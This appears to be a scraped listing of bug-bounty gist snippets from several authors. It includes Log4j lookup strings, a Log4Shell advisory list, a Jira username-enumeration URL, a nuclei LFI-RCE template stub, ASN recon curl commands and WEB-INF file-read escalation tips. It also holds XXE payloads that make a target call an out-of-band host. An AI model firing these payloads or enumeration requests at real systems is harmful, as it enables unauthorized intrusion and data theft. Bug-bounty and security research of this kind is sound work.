bugbountynights

${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}

SwitHak

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

• If you want to add a link, comment or send it to me
• Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

• Royce Williams list sorted by vendors responses Royce List
• Very detailed list NCSC-NL
• The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List

qurbat

#!/usr/bin/python

import io
import tldextract

infile = "domains.txt"

def extract(infile):
    with io.open(infile) as f:
        for line in f:

0x240x23elu

cve-2019-8449 
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. 
 https://jira.atlassian.com/browse/JRASERVER-69796
 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================

honoki

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

m4ll0k

# github.com/m4ll0k (@m4ll0k2) 

'''
Steps:

0. Make dir like chaos 'mkdir chaos'
1. Download this script in choas dir 'wget https://..'
2. Now: 'python3 choas.py |sort -u > dns_wordlist.txt'
'''

0x240x23elu

id: LFI-RCE

info:
  name: LFI Detection
  author: 0x240x23elu & payloadallthings
  severity: High

requests:
  - method: GET

Sturtuk

<?php
/**
 * Created by PhpStorm.
 * User: edwinsturt
 * Date: 2020-06-24
 * Time: 00:45
 */

$file = 'main.ff0058ad.js.map';

akhil-reni

Search ASN number using organization name

curl -X GET "https://api.spyse.com/v2/data/as/search?limit=100&search_params=%7B%22as_org%22%3A%5B%7B%22operator%22%3A%22contains%22%2C%22value%22%3A%22Oath%20Holdings%20Inc.%22%7D%5D%7D" -H "accept: application/json" -H "Authorization: Bearer token"

Fetch domains using ASN

curl -X GET "https://api.spyse.com/v2/data/as/domain?limit=100&asn=10310" -H "accept: application/json" -H "Authorization: Bearer token"

harisec

so, you can read WEB-INF/web.xml. how can you escalate this issue?

[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml. 

use a specialized wordlist such as the following (from 	Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.